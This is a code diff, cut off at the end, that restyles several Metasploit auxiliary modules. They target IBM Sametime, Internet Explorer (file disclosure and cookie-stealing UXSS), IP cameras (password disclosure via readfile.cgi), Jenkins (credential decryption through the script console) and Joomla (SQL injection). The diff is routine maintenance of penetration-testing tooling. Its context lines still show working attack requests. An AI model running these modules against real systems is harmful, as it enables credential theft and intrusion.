@@ -10,42 +10,49 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'IBM Lotus Notes Sametime Room Name Bruteforce',
-      'Description'    => %q{
-        This module bruteforces Sametime meeting room names via the IBM
-        Lotus Notes Sametime web interface.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM Lotus Notes Sametime Room Name Bruteforce',
+        'Description' => %q{
+          This module bruteforces Sametime meeting room names via the IBM
+          Lotus Notes Sametime web interface.
+        },
+        'Author' => [
          'kicks4kittens' # Metasploit module
        ],
-      'References' =>
-        [
+        'References' => [
          [ 'CVE', '2013-3977' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2013-12-27'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2013-12-27',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(443),
-        OptString.new('OWNER', [ true,  'The owner to bruteforce meeting room names for', '']),
-        OptPath.new('DICT', [ true,  'The path to the userinfo script' ]),
+        OptString.new('OWNER', [ true, 'The owner to bruteforce meeting room names for', '']),
+        OptPath.new('DICT', [ true, 'The path to the userinfo script' ]),
        OptString.new('TARGETURI', [ true, 'Path to stmeetings', '/stmeetings/'])
-      ])
+      ]
+    )

    register_advanced_options(
      [
-        OptInt.new('TIMING', [ true,  'Set pause between requests', 0]),
-        OptInt.new('Threads', [ true,  'Number of test threads', 10])
-      ])
+        OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
+        OptInt.new('Threads', [ true, 'Number of test threads', 10])
+      ]
+    )
  end

  def run
@@ -58,13 +65,13 @@ class MetasploitModule < Msf::Auxiliary
    @reqpath = normalize_uri(uri, '/restapi')

    res = send_request_cgi({
-      'uri'     =>  @reqpath,
-      'method'  => 'GET',
-      'ctype'   => 'text/html',
+      'uri' => @reqpath,
+      'method' => 'GET',
+      'ctype' => 'text/html',
      'vars_get' => {
        'owner' => datastore['OWNER'],
        'permaName' => rval
-        }
+      }
    })

    unless res
@@ -89,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary

    print_status("Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)")

-    while(not @test_queue.empty?)
+    while (not @test_queue.empty?)
      t = []
      nt = datastore['Threads'].to_i
      nt = 1 if nt <= 0
@@ -114,11 +121,10 @@ class MetasploitModule < Msf::Auxiliary
            end
          end
        end
-      t.each {|x| x.join }
-
+        t.each { |x| x.join }
      rescue ::Timeout::Error
      ensure
-        t.each {|x| x.kill rescue nil }
+        t.each { |x| x.kill rescue nil }
      end
    end
  end
@@ -131,9 +137,9 @@ class MetasploitModule < Msf::Auxiliary
    end

    res = send_request_cgi({
-      'uri'     =>  @reqpath,
-      'method'  => 'GET',
-      'ctype'   => 'text/html',
+      'uri' => @reqpath,
+      'method' => 'GET',
+      'ctype' => 'text/html',
      'vars_get' =>
        {
          'owner' => datastore['OWNER'],
@@ -157,36 +163,34 @@ class MetasploitModule < Msf::Auxiliary
  end

  def output_table(room_info, test_current)
-
    print_good("New meeting room found: #{test_current}")

    # print output table for discovered meeting rooms
    roomtbl = Msf::Ui::Console::Table.new(
      Msf::Ui::Console::Table::Style::Default,
-        'Header'  => "[IBM Lotus Sametime] Meeting Room #{test_current}",
-        'Prefix'  => "",
-        'Postfix' => "\n",
-        'Indent'  => 1,
-        'Columns' =>
-          [
-            "Key",
-            "Value"
-          ]
-      )
+      'Header' => "[IBM Lotus Sametime] Meeting Room #{test_current}",
+      'Prefix' => "",
+      'Postfix' => "\n",
+      'Indent' => 1,
+      'Columns' =>
+        [
+          "Key",
+          "Value"
+        ]
+    )

    room_info['results'][0].each do |k, v|
      if v.is_a?(Hash)
        # breakdown Hash
        roomtbl << [ k.to_s, '>>' ] # title line
-        v.each do | subk, subv |
-          roomtbl << [ "#{k.to_s}:#{subk.to_s}", subv.to_s || "-"]  if not v.nil? or v.empty?
+        v.each do |subk, subv|
+          roomtbl << [ "#{k.to_s}:#{subk.to_s}", subv.to_s || "-"] if not v.nil? or v.empty?
        end
      else
-        roomtbl << [ k.to_s, v.to_s || "-"]  unless v.nil?
+        roomtbl << [ k.to_s, v.to_s || "-"] unless v.nil?
      end
    end
    # output table
    print_good(roomtbl.to_s)
-
  end
 end
@@ -10,16 +10,16 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  URLS = [
-      '/stmeetings/about.jsp',
-      '/stmeetings/serverversion.properties',
-      '/rtc/buildinfo.txt',
-      '/stmeetings/configuration?format=json&verbose=true'
+    '/stmeetings/about.jsp',
+    '/stmeetings/serverversion.properties',
+    '/rtc/buildinfo.txt',
+    '/stmeetings/configuration?format=json&verbose=true'
  ]

  PROXY_URLS = [
-      '/stwebclient/i18nStrings.jsp',
-      '/stwebclient/communityserver',
-      '/stwebav/WebAVServlet?Name=WebPlayerVersion'
+    '/stwebclient/i18nStrings.jsp',
+    '/stwebclient/communityserver',
+    '/stwebav/WebAVServlet?Name=WebPlayerVersion'
  ]

  JSON_KEYS = [
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
  INFO_REGEXS = [
    # section, key, regex
    [ 'version', 'sametimeVersion', /lotusBuild">Release (.+?)<\/td>/i ],
-    [ 'api', 'meeting',  /^meeting=(.*)$/i ],
+    [ 'api', 'meeting', /^meeting=(.*)$/i ],
    [ 'api', 'appshare', /^appshare=(.*)$/i ],
    [ 'api', 'docshare', /^docshare=(.*)$/i ],
    [ 'api', 'rtc4web', /^rtc4web=(.*)$/i ],
@@ -56,50 +56,54 @@ class MetasploitModule < Msf::Auxiliary
    [ 'api', 'video', /^video=(.*)$/i]
  ]

-
  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'IBM Lotus Sametime Version Enumeration',
-      'Description' => %q{
-        This module scans an IBM Lotus Sametime web interface to enumerate
-        the application's version and configuration information.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM Lotus Sametime Version Enumeration',
+        'Description' => %q{
+          This module scans an IBM Lotus Sametime web interface to enumerate
+          the application's version and configuration information.
+        },
+        'Author' => [
          'kicks4kittens' # Metasploit module
        ],
-      'References' =>
-        [
+        'References' => [
          [ 'CVE', '2013-3982' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2013-12-27'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2013-12-27',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(443),
-        OptString.new('TARGETURI', [ true,  "The path to the Sametime Server", '/']),
-        OptBool.new('QuerySametimeProxy', [ true,  "Automatically query Sametime proxy if found", true]),
-        OptBool.new('ShowVersions', [ true,  "Display Version information from server", true]),
-        OptBool.new('ShowConfig', [ true,  "Display Config information from server", true]),
-        OptBool.new('ShowAPIVersions', [ true,  "Display API Version information from server", false])
-      ])
+        OptString.new('TARGETURI', [ true, "The path to the Sametime Server", '/']),
+        OptBool.new('QuerySametimeProxy', [ true, "Automatically query Sametime proxy if found", true]),
+        OptBool.new('ShowVersions', [ true, "Display Version information from server", true]),
+        OptBool.new('ShowConfig', [ true, "Display Config information from server", true]),
+        OptBool.new('ShowAPIVersions', [ true, "Display API Version information from server", false])
+      ]
+    )

    register_advanced_options(
      [
-        OptBool.new('StoreConfigs', [ true,  "Store JSON configs to loot", true])
-      ])
-
+        OptBool.new('StoreConfigs', [ true, "Store JSON configs to loot", true])
+      ]
+    )
  end

-  def check_url(url, proxy='')
-
+  def check_url(url, proxy = '')
    cgi_options = {
      'uri' => normalize_uri(target_path, url),
      'method' => 'GET'
@@ -199,47 +203,50 @@ class MetasploitModule < Msf::Auxiliary
    # configure tables
    version_tbl = Msf::Ui::Console::Table.new(
      Msf::Ui::Console::Table::Style::Default,
-      'Header'  => "IBM Lotus Sametime Information [Version]",
-      'Prefix'  => "",
-      'Indent'  => 1,
-      'Columns'   =>
+      'Header' => "IBM Lotus Sametime Information [Version]",
+      'Prefix' => "",
+      'Indent' => 1,
+      'Columns' =>
      [
        "Component",
        "Version"
-      ])
+      ]
+    )

    conf_tbl = Msf::Ui::Console::Table.new(
      Msf::Ui::Console::Table::Style::Default,
-      'Header'  => "IBM Lotus Sametime Information [Config]",
-      'Prefix'  => "",
-      'Indent'  => 1,
-      'Columns'   =>
+      'Header' => "IBM Lotus Sametime Information [Config]",
+      'Prefix' => "",
+      'Indent' => 1,
+      'Columns' =>
      [
        "Key",
        "Value"
-      ])
+      ]
+    )

    api_tbl = Msf::Ui::Console::Table.new(
      Msf::Ui::Console::Table::Style::Default,
-      'Header'  => "IBM Lotus Sametime Information [API]",
-      'Prefix'  => "",
-      'Indent'  => 1,
-      'Columns'   =>
+      'Header' => "IBM Lotus Sametime Information [API]",
+      'Prefix' => "",
+      'Indent' => 1,
+      'Columns' =>
      [
        "API",
        "Version"
-      ])
+      ]
+    )

    # populate tables
-    @version_info['version'].each do | line |
+    @version_info['version'].each do |line|
      version_tbl << [ line[0], line[1] ]
    end

-    @version_info['conf'].each do | line |
+    @version_info['conf'].each do |line|
      conf_tbl << [ line[0], line[1] ]
    end

-    @version_info['api'].each do | line |
+    @version_info['api'].each do |line|
      api_tbl << [ line[0], line[1] ]
    end

@@ -250,11 +257,11 @@ class MetasploitModule < Msf::Auxiliary

    # report_note
    report_note(
-      :host  => rhost,
-      :port  => rport,
+      :host => rhost,
+      :port => rport,
      :proto => 'http',
      :ntype => 'ibm_lotus_sametime_version',
-      :data  => { :version => @version_info['version']['sametimeVersion'] }
+      :data => { :version => @version_info['version']['sametimeVersion'] }
    ) if @version_info['version']['sametimeVersion']
  end

@@ -297,7 +304,7 @@ class MetasploitModule < Msf::Auxiliary
    @version_info['api'] = {}

    print_status("Checking IBM Lotus Sametime Server")
-    URLS.each do | url |
+    URLS.each do |url|
      check_url(url)
    end

@@ -312,7 +319,7 @@ class MetasploitModule < Msf::Auxiliary

      print_good("Sametime Proxy address discovered #{proxy}")

-      PROXY_URLS.each do | url |
+      PROXY_URLS.each do |url|
        check_url(url, proxy)
      end
    elsif proxy?
@@ -6,37 +6,45 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability',
-      'Description'    => %q{
-        It was found that Internet Explorer allows the disclosure of local file names.
-        This issue exists due to the fact that Internet Explorer behaves different for
-        file:// URLs pointing to existing and non-existent files. When used in
-        combination with HTML5 sandbox iframes it is possible to use this behavior to
-        find out if a local file exists. This technique only works on Internet Explorer
-        10 & 11 since these support the HTML5 sandbox. Also it is not possible to do
-        this from a regular website as file:// URLs are blocked all together. The attack
-        must be performed locally (works with Internet zone Mark of the Web) or from a
-        share.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => 'Yorick Koster',
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability',
+        'Description' => %q{
+          It was found that Internet Explorer allows the disclosure of local file names.
+          This issue exists due to the fact that Internet Explorer behaves different for
+          file:// URLs pointing to existing and non-existent files. When used in
+          combination with HTML5 sandbox iframes it is possible to use this behavior to
+          find out if a local file exists. This technique only works on Internet Explorer
+          10 & 11 since these support the HTML5 sandbox. Also it is not possible to do
+          this from a regular website as file:// URLs are blocked all together. The attack
+          must be performed locally (works with Internet zone Mark of the Web) or from a
+          share.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'Yorick Koster',
+        'References' => [
          ['CVE', '2016-3321'],
          ['MSB', 'MS16-095'],
          ['URL', 'https://securify.nl/advisory/SFY20160301/internet_explorer_iframe_sandbox_local_file_name_disclosure_vulnerability.html'],
        ],
-      'Platform'       => 'win',
-      'DisclosureDate' => '2016-08-09'
-    ))
+        'Platform' => 'win',
+        'DisclosureDate' => '2016-08-09',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('SHARENAME', [ true, "The name of the top-level share.", "falcon" ]),
        OptString.new('PATHS', [ true, "The list of files to check (comma separated).", "Testing/Not/Found/Check.txt, Windows/System32/calc.exe, Program Files (x86)/Mozilla Firefox/firefox.exe, Program Files/VMware/VMware Tools/TPAutoConnSvc.exe" ]),
-      ])
+      ]
+    )

    # no SSL
    deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT', 'URIPATH')
@@ -110,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
  end

  def on_request_uri(cli, request)
-    my_host  = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

    case request.method
    when 'OPTIONS'
@@ -176,15 +184,15 @@ class MetasploitModule < Msf::Auxiliary
    print_status("OPTIONS #{request.uri}")
    headers = {
      'MS-Author-Via' => 'DAV',
-      'DASL'          => '<DAV:sql>',
-      'DAV'           => '1, 2',
-      'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
-      'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+      'DASL' => '<DAV:sql>',
+      'DAV' => '1, 2',
+      'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+      'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
      'Cache-Control' => 'private'
    }

    resp = create_response(207, "Multi-Status")
-    headers.each_pair {|k,v| resp[k] = v }
+    headers.each_pair { |k, v| resp[k] = v }
    resp.body = ""
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
@@ -213,7 +221,7 @@ class MetasploitModule < Msf::Auxiliary
 <D:prop>
 <lp1:resourcetype/>
 <lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
-<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
+<lp1:getcontentlength>#{rand(0x100000) + 128000}</lp1:getcontentlength>
 <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
 <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
 <lp2:executable>T</lp2:executable>
@@ -306,7 +314,7 @@ class MetasploitModule < Msf::Auxiliary

  def generate_shares(path)
    share_name = datastore['SHARENAME']
-%Q|
+    %Q|
 <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
 <D:href>#{path}#{share_name}/</D:href>
 <D:propstat>
@@ -345,7 +353,7 @@ class MetasploitModule < Msf::Auxiliary
 <D:prop>
 <lp1:resourcetype/>
 <lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
-<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
+<lp1:getcontentlength>#{rand(0x10000) + 120}</lp1:getcontentlength>
 <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
 <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
 <lp2:executable>T</lp2:executable>
@@ -368,11 +376,11 @@ class MetasploitModule < Msf::Auxiliary
 |
  end

-  def gen_timestamp(ttype=nil)
+  def gen_timestamp(ttype = nil)
    ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
  end

-  def gen_datestamp(ttype=nil)
+  def gen_datestamp(ttype = nil)
    ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
  end

@@ -6,41 +6,48 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
-      'Description'    => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
+        'Description' => %q{
          This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
          Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
          have X-Frame-Options or it will fail). You can also have your own custom JavaScript
          by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
          you are behind NAT.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'David Leo',      # Original discovery
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'David Leo', # Original discovery
          'filedescriptor', # PoC
          'joev',           # He figured it out really
          'sinn3r'          # MSF
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'CVE', '2015-0072' ],
          [ 'OSVDB', '117876' ],
          [ 'MSB', 'MS15-018' ],
          [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2015/Feb/10' ]
        ],
-      'Platform'       => 'win',
-      'DisclosureDate' => '2015-02-01'
-    ))
+        'Platform' => 'win',
+        'DisclosureDate' => '2015-02-01',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
-    [
-      OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
-      OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
-    ])
+      [
+        OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
+        OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
+      ]
+    )
  end

  def setup
@@ -63,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
    @ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
  end

-  def get_uri(cli=self.cli)
+  def get_uri(cli = self.cli)
    ssl = datastore["SSL"]
    proto = (ssl ? "https://" : "http://")
    if datastore['URIHOST']
@@ -14,10 +14,9 @@ class MetasploitModule < Msf::Auxiliary
        info,
        'Name' => 'HTTP SSL Certificate Impersonation',
        'Author' => 'Chris John Riley',
-        'References' =>
-            [
-              ['URL', 'https://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles']
-            ],
+        'References' => [
+          ['URL', 'https://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles']
+        ],
        'License' => MSF_LICENSE,
        'Description' => %q{
          This module request a copy of the remote SSL certificate and creates a local
@@ -25,6 +24,11 @@ class MetasploitModule < Msf::Auxiliary
          then Outputs (PEM|DER) format private key / certificate and a combined version
          for use in Apache or other Metasploit modules requiring SSLCert Inputs for private
          key / CA cert have been provided for those with DigiNotar certs hanging about!
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
@@ -51,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
  end

  def get_cert(rhost, rport, sni)
-    info_hash = {'PeerHost' => sni, 'PeerAddr' => rhost, 'PeerPort' => rport.to_s}
+    info_hash = { 'PeerHost' => sni, 'PeerAddr' => rhost, 'PeerPort' => rport.to_s }
    sslSocket = Rex::Socket::SslTcp.create(info_hash)
    cert = sslSocket.peer_cert
    sslSocket.close
@@ -218,6 +222,5 @@ class MetasploitModule < Msf::Auxiliary

    p = store_loot("#{datastore['RHOST'].downcase}_pem", 'pem', addr, combined, 'imp_ssl.pem', 'Impersonate_SSL')
    print_good("pem: #{p}")
-
  end
 end
@@ -10,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'         => 'JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure',
-      'Description'  => %q{
+      'Name' => 'JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure',
+      'Description' => %q{
        SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),
        and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)
        allow an unauthenticated user to disclose the username & password by
        requesting the javascript page 'readfile.cgi?query=ADMINID'.
        Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
      },
-      'References'   =>
-        [
-          ['EDB', '40254'],
-          ['EDB', '40263'],
-          ['EDB', '40264']
-        ],
-      'Author'       =>
-        [
-          'Yakir Wizman', # discovery
-          'h00die',    # module
-        ],
-      'License'      => MSF_LICENSE,
+      'References' => [
+        ['EDB', '40254'],
+        ['EDB', '40263'],
+        ['EDB', '40264']
+      ],
+      'Author' => [
+        'Yakir Wizman', # discovery
+        'h00die', # module
+      ],
+      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Aug 16 2016'
    )

@@ -43,8 +41,8 @@ class MetasploitModule < Msf::Auxiliary
      url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'readfile.cgi')
      vprint_status("Attempting to load data from #{url}?query=ADMINID")
      res = send_request_cgi({
-        'uri'      => url,
-        'vars_get' => {'query'=>'ADMINID'}
+        'uri' => url,
+        'vars_get' => { 'query' => 'ADMINID' }
      })
      unless res
        print_error("#{peer} Unable to connect to #{url}")
@@ -59,8 +57,8 @@ class MetasploitModule < Msf::Auxiliary
      if res.body =~ /var Adm_ID="(.+?)";\s+var Adm_Pass1="(.+?)";/
        print_good("Found: #{$1}:#{$2}")
        store_valid_credential(
-          user:         $1,
-          private:      $2,
+          user: $1,
+          private: $2,
          private_type: :password
        )
      end
@@ -11,24 +11,24 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        => 'Java RMI Registry Interfaces Enumeration',
-      'Description'    => %q{
+      'Name' => 'Java RMI Registry Interfaces Enumeration',
+      'Description' => %q{
        This module gathers information from an RMI endpoint running an RMI registry
        interface. It enumerates the names bound in a registry and looks up each
        remote reference.
      },
-      'Author'      => ['juan vazquez'],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'https://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html']
-        ]
+      'Author' => ['juan vazquez'],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'https://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html']
+      ]
    )

    register_options(
      [
        Opt::RPORT(1099)
-      ])
+      ]
+    )
  end

  def run
@@ -65,7 +65,6 @@ class MetasploitModule < Msf::Auxiliary
    print_good("#{names.length} names found in the Registry")

    names.each do |name|
-
      begin
        remote_reference = send_registry_lookup(name: name)
      rescue ::Rex::Proto::Rmi::Exception => e
@@ -9,40 +9,45 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Jenkins Domain Credential Recovery',
-      'Description'    => %q{
-        This module will collect Jenkins domain credentials, and uses
-        the script console to decrypt each password if anonymous permission
-        is allowed.
+    super(
+      update_info(
+        info,
+        'Name' => 'Jenkins Domain Credential Recovery',
+        'Description' => %q{
+          This module will collect Jenkins domain credentials, and uses
+          the script console to decrypt each password if anonymous permission
+          is allowed.

-        It has been tested against Jenkins version 1.590, 1.633, and 1.638.
-      },
-      'Author'         =>
-        [
+          It has been tested against Jenkins version 1.590, 1.633, and 1.638.
+        },
+        'Author' => [
          'Th3R3p0', # Vuln Discovery, PoC
-          'sinn3r'   # Metasploit
+          'sinn3r' # Metasploit
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'EDB', '38664' ],
          [ 'URL', 'https://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html' ]
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'RPORT' => 8080
        },
-      'License'        => MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
-        OptString.new('TARGETURI',     [true, 'The base path for Jenkins', '/']),
+        OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
        OptString.new('JENKINSDOMAIN', [true, 'The domain where we want to extract credentials from', '_'])
-      ])
+      ]
+    )
  end

-
  # Returns the Jenkins version.
  #
  # @return [String] Jenkins version.
@@ -61,7 +66,6 @@ class MetasploitModule < Msf::Auxiliary
    version.scan(/jenkins\-([\d\.]+)/).flatten.first
  end

-
  # Returns the Jenkins domain configured by the user.
  #
  # @return [String]
@@ -69,7 +73,6 @@ class MetasploitModule < Msf::Auxiliary
    datastore['JENKINSDOMAIN']
  end

-
  # Returns a check code indicating the vulnerable status.
  #
  # @return [Array] Check code
@@ -86,7 +89,6 @@ class MetasploitModule < Msf::Auxiliary
    Exploit::CheckCode::Safe
  end

-
  # Returns all the found Jenkins accounts of a specific domain. The accounts collected only
  # include the ones with the username-and-password kind. It does not include other kinds such
  # as SSH, certificates, or other plugins.
@@ -99,7 +101,7 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)
    uri << '/'

-    res = send_request_cgi({ 'uri'=>uri })
+    res = send_request_cgi({ 'uri' => uri })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while enumerating accounts.')
@@ -120,18 +122,17 @@ class MetasploitModule < Msf::Auxiliary
      next unless /Username with password/i === kind

      users << {
-        id:          id,
-        username:    name,
-        kind:        kind,
+        id: id,
+        username: name,
+        kind: kind,
        description: desc,
-        domain:      domain
+        domain: domain
      }
    end

    users
  end

-
  # Returns the found encrypted password from the update page.
  #
  # @param id [String] The ID of a specific account.
@@ -140,7 +141,7 @@ class MetasploitModule < Msf::Auxiliary
  # @return [NilCass] No encrypted password found.
  def get_encrypted_password(id)
    uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')
-    res = send_request_cgi({ 'uri'=>uri })
+    res = send_request_cgi({ 'uri' => uri })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while getting the encrypted password')
@@ -158,7 +159,6 @@ class MetasploitModule < Msf::Auxiliary
    nil
  end

-
  # Returns the decrypted password by using the script console.
  #
  # @param encrypted_pass [String] The encrypted password.
@@ -166,13 +166,13 @@ class MetasploitModule < Msf::Auxiliary
  # @return [String] The decrypted password.
  # @return [NilClass] No decrypted password found (no result found on the console)
  def decrypt(encrypted_pass)
-    uri  = normalize_uri(target_uri, 'script')
-    res  = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => uri,
+    uri = normalize_uri(target_uri, 'script')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
      'vars_post' => {
        'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'",
-        'json'   => {'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'"}.to_json,
+        'json' => { 'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'" }.to_json,
        'Submit' => 'Run'
      }
    })
@@ -198,7 +198,6 @@ class MetasploitModule < Msf::Auxiliary
    nil
  end

-
  # Decrypts an encrypted password for a given ID.
  #
  # @param id [String] Account ID.
@@ -210,7 +209,6 @@ class MetasploitModule < Msf::Auxiliary
    decrypt(encrypted_pass)
  end

-
  # Reports the username and password to database.
  #
  # @param opts [Hash]
@@ -250,7 +248,6 @@ class MetasploitModule < Msf::Auxiliary
    create_credential_login(login_data)
  end

-
  def run
    users = get_users
    print_status("Found users for domain #{domain}: #{users.length}")
@@ -275,18 +272,15 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

-
-  def print_status(msg='')
+  def print_status(msg = '')
    super("#{peer} - #{msg}")
  end

-
-  def print_good(msg='')
+  def print_good(msg = '')
    super("#{peer} - #{msg}")
  end

-
-  def print_error(msg='')
+  def print_error(msg = '')
    super("#{peer} - #{msg}")
  end
 end
@@ -8,37 +8,44 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
-      'Description'    => %q{
-        This module exploits a SQL injection vulnerability in Joomla Plugin
-        com_realestatemanager versions 3.7 in order to either enumerate
-        usernames and password hashes.
-      },
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability in Joomla Plugin
+          com_realestatemanager versions 3.7 in order to either enumerate
+          usernames and password hashes.
+        },
+        'References' => [
          ['EDB', '38445']
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'Omer Ramic', # discovery
